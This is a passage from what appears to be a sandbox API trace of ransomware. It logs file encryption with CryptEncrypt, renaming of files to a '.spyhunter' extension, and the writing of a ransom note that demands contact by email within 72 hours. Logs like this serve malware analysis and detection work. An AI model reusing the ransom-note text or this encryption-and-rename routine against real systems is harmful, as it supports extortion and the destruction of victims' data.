lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.329] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x270e9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e9b4*=0xcb, lpOverlapped=0x0) returned 1 [0160.329] GetProcessHeap () returned 0x2c0000 [0160.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.329] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.329] WriteFile (in: hFile=0x178, lpBuffer=0x270e9f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9b4, lpOverlapped=0x0 | out: lpBuffer=0x270e9f4*, lpNumberOfBytesWritten=0x270e9b4*=0x4, lpOverlapped=0x0) returned 1 [0160.329] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9b4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9b4*=0x30, lpOverlapped=0x0) returned 1 [0160.329] CloseHandle (hObject=0x178) returned 1 [0160.329] GetProcessHeap () returned 0x2c0000 [0160.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0160.329] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.spyhunter") returned 165 [0160.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ms\\messages.json.spyhunter")) returned 1 [0160.330] GetProcessHeap () returned 0x2c0000 [0160.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0160.331] GetProcessHeap () returned 0x2c0000 [0160.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.331] GetProcessHeap () returned 0x2c0000 [0160.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9060 | out: hHeap=0x2c0000) returned 1 [0160.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.332] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.332] WriteFile (in: hFile=0x178, lpBuffer=0x270e927*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ea50, lpOverlapped=0x0 | out: lpBuffer=0x270e927*, lpNumberOfBytesWritten=0x270ea50*=0x127, lpOverlapped=0x0) returned 1 [0160.332] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.332] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ea50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ea50*=0x2ac, lpOverlapped=0x0) returned 1 [0160.333] CloseHandle (hObject=0x178) returned 1 [0160.333] GetProcessHeap () returned 0x2c0000 [0160.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8ed8 | out: hHeap=0x2c0000) returned 1 [0160.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9f0 | out: pbBuffer=0x270e9f0) returned 1 [0160.333] GetProcessHeap () returned 0x2c0000 [0160.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9e8*=0x30) returned 1 [0160.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json") returned 155 [0160.497] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.497] GetProcessHeap () returned 0x2c0000 [0160.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0160.497] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e9ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e9ac*=0x12c, lpOverlapped=0x0) returned 1 [0160.498] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffed4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.498] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x270e9ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e9ac*=0x12c, lpOverlapped=0x0) returned 1 [0160.498] GetProcessHeap () returned 0x2c0000 [0160.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0160.498] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.498] WriteFile (in: hFile=0x178, lpBuffer=0x270e9ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e9ac, lpOverlapped=0x0 | out: lpBuffer=0x270e9ec*, lpNumberOfBytesWritten=0x270e9ac*=0x4, lpOverlapped=0x0) returned 1 [0160.498] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e9ac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270e9ac*=0x30, lpOverlapped=0x0) returned 1 [0160.498] CloseHandle (hObject=0x178) returned 1 [0160.498] GetProcessHeap () returned 0x2c0000 [0160.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.498] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.spyhunter") returned 165 [0160.498] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mr\\messages.json.spyhunter")) returned 1 [0160.499] GetProcessHeap () returned 0x2c0000 [0160.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.500] GetProcessHeap () returned 0x2c0000 [0160.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.500] GetProcessHeap () returned 0x2c0000 [0160.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc8d50 | out: hHeap=0x2c0000) returned 1 [0160.500] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9e8 | out: pbBuffer=0x270e9e8) returned 1 [0160.500] GetProcessHeap () returned 0x2c0000 [0160.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.500] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9e0*=0x30) returned 1 [0160.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.630] GetProcessHeap () returned 0x2c0000 [0160.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.646] GetProcessHeap () returned 0x2c0000 [0160.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb30b8 | out: hHeap=0x2c0000) returned 1 [0160.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9e8 | out: pbBuffer=0x270e9e8) returned 1 [0160.652] GetProcessHeap () returned 0x2c0000 [0160.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9e0*=0x30) returned 1 [0160.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_few-showers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.668] GetProcessHeap () returned 0x2c0000 [0160.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.668] GetProcessHeap () returned 0x2c0000 [0160.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f370 | out: hHeap=0x2c0000) returned 1 [0160.668] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9e0 | out: pbBuffer=0x270e9e0) returned 1 [0160.668] GetProcessHeap () returned 0x2c0000 [0160.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.668] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9d8*=0x30) returned 1 [0160.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_gray_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_gray_cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.685] GetProcessHeap () returned 0x2c0000 [0160.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.685] GetProcessHeap () returned 0x2c0000 [0160.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f420c0 | out: hHeap=0x2c0000) returned 1 [0160.685] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9e0 | out: pbBuffer=0x270e9e0) returned 1 [0160.685] GetProcessHeap () returned 0x2c0000 [0160.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.685] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9d8*=0x30) returned 1 [0160.685] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.701] GetProcessHeap () returned 0x2c0000 [0160.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.701] GetProcessHeap () returned 0x2c0000 [0160.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f48e50 | out: hHeap=0x2c0000) returned 1 [0160.701] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9d8 | out: pbBuffer=0x270e9d8) returned 1 [0160.702] GetProcessHeap () returned 0x2c0000 [0160.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9d0*=0x30) returned 1 [0160.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.710] GetProcessHeap () returned 0x2c0000 [0160.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.711] GetProcessHeap () returned 0x2c0000 [0160.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3eab0 | out: hHeap=0x2c0000) returned 1 [0160.711] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9d8 | out: pbBuffer=0x270e9d8) returned 1 [0160.711] GetProcessHeap () returned 0x2c0000 [0160.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.711] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9d0*=0x30) returned 1 [0160.711] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_foggy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.721] GetProcessHeap () returned 0x2c0000 [0160.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.723] GetProcessHeap () returned 0x2c0000 [0160.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41880 | out: hHeap=0x2c0000) returned 1 [0160.723] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9d0 | out: pbBuffer=0x270e9d0) returned 1 [0160.723] GetProcessHeap () returned 0x2c0000 [0160.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.725] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9c8*=0x30) returned 1 [0160.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.725] GetProcessHeap () returned 0x2c0000 [0160.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.725] GetProcessHeap () returned 0x2c0000 [0160.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41460 | out: hHeap=0x2c0000) returned 1 [0160.725] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9d0 | out: pbBuffer=0x270e9d0) returned 1 [0160.725] GetProcessHeap () returned 0x2c0000 [0160.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.725] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9c8*=0x30) returned 1 [0160.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.729] GetProcessHeap () returned 0x2c0000 [0160.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.729] GetProcessHeap () returned 0x2c0000 [0160.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41358 | out: hHeap=0x2c0000) returned 1 [0160.729] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9c8 | out: pbBuffer=0x270e9c8) returned 1 [0160.729] GetProcessHeap () returned 0x2c0000 [0160.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.729] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9c0*=0x30) returned 1 [0160.729] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.741] GetProcessHeap () returned 0x2c0000 [0160.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.741] GetProcessHeap () returned 0x2c0000 [0160.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43d28 | out: hHeap=0x2c0000) returned 1 [0160.742] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9c8 | out: pbBuffer=0x270e9c8) returned 1 [0160.742] GetProcessHeap () returned 0x2c0000 [0160.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9c0*=0x30) returned 1 [0160.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\6.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\6.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.775] GetProcessHeap () returned 0x2c0000 [0160.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.775] GetProcessHeap () returned 0x2c0000 [0160.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeefa8 | out: hHeap=0x2c0000) returned 1 [0160.776] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9c0 | out: pbBuffer=0x270e9c0) returned 1 [0160.776] GetProcessHeap () returned 0x2c0000 [0160.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.776] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9b8*=0x30) returned 1 [0160.776] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\41.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.781] GetProcessHeap () returned 0x2c0000 [0160.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.782] GetProcessHeap () returned 0x2c0000 [0160.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee868 | out: hHeap=0x2c0000) returned 1 [0160.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9c0 | out: pbBuffer=0x270e9c0) returned 1 [0160.782] GetProcessHeap () returned 0x2c0000 [0160.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.782] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9b8*=0x30) returned 1 [0160.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.782] GetProcessHeap () returned 0x2c0000 [0160.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0160.782] GetProcessHeap () returned 0x2c0000 [0160.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee210 | out: hHeap=0x2c0000) returned 1 [0160.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e9b8 | out: pbBuffer=0x270e9b8) returned 1 [0160.782] GetProcessHeap () returned 0x2c0000 [0160.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0160.783] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270e9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270e9b0*=0x30) returned 1 [0160.783] 